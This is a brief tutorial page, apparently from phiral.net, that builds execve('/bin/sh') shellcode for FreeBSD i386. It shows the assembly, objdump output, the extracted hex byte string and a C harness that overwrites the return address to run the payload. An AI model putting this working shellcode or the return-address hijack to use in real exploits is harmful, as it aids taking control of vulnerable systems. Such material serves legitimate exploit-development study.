FreeBSD Shellcode

phiral.net
Home
|=----------------------------=[ FreeBSD Shellcode ]=-------------------------=|
|=----------------------------------------------------------------------------=|

----[ Intro

(ultra basic [fixme])

[lhall@redcell ~]$ uname -a
FreeBSD redcell 6.2-RELEASE-p7 FreeBSD 6.2-RELEASE-p7 #0: Sun Aug  5 14:38:45 EDT 2007     
lhall@:/usr/obj/usr/src/sys/REDCELL  i386

[lhall@redcell ~]$

[lhall@redcell ~]$ cat > fbsdshell.s << EOF
> .section .text
> .globl _start
> _start:
>    xorl  %eax, %eax  # set eax to 0
>    pushl %eax        # push it for null of /bin/sh
>    pushl \$0x68732f2f # push //sh
>    pushl \$0x6e69622f # push /bin
>    movl  %esp, %ecx  # copy address of string to ecx
>    pushl %eax        # push null
>    pushl %esp        # push address of string
>    pushl %ecx        # push string
>    mov   \$59, %al    # execve syscall
>    pushl %eax        # push nothing useful
>    int \$0x80
> EOF

[lhall@redcell ~]$ cat fbsdshell.s
.section .text
.globl _start
_start:
   xorl  %eax, %eax  # set eax to 0
   pushl %eax        # push it for null of /bin/sh
   pushl $0x68732f2f # push //sh
   pushl $0x6e69622f # push /bin
   movl  %esp, %ecx  # copy address of string to ecx
   pushl %eax        # push null
   pushl %esp        # push address of string
   pushl %ecx        # push string
   mov   $59, %al    # execve syscall
   pushl %eax        # push nothing useful
   int $0x80

[lhall@redcell ~]$ as fbsdshell.s -o fbsdshell.o

[lhall@redcell ~]$ ld fbsdshell.o -o fbsdshell

[lhall@redcell ~]$ objdump -d fbsdshell

fbsdshell:     file format elf32-i386-freebsd

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0                   xor    %eax,%eax
 8048076:       50                      push   %eax
 8048077:       68 2f 2f 73 68          push   $0x68732f2f
 804807c:       68 2f 62 69 6e          push   $0x6e69622f
 8048081:       89 e1                   mov    %esp,%ecx
 8048083:       50                      push   %eax
 8048084:       54                      push   %esp
 8048085:       51                      push   %ecx
 8048086:       b0 3b                   mov    $0x3b,%al
 8048088:       50                      push   %eax
 8048089:       cd 80                   int    $0x80

[lhall@redcell ~]$ ./shellcode.py -b fbsdshell
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe1\x50\x54\x51\xb0\x3b\x50\xcd\x80"

[lhall@redcell ~]$ ./fbsdshell
$ exit

[lhall@redcell ~]$ cat > execme.c << EOF
> char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe1\x50\x54\x51\xb0\x3b\x50\xcd\x80";
>
> void main(void) {
>    int *ret;
>    ret = (int *)&ret + 2;
>    (*ret) = (int)sc;
>
> }
> EOF
[lhall@redcell ~]$

[lhall@redcell ~]$ cat execme.c
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe1\x50\x54\x51\xb0\x3b\x50\xcd\x80";

void main(void) {
   int *ret;
   ret = (int *)&ret + 2;
   (*ret) = (int)sc;

}
[lhall@redcell ~]$ gcc execme.c
execme.c: In function `main':
execme.c:3: warning: return type of 'main' is not `int'

[lhall@redcell ~]$ ./a.out
$
$ exit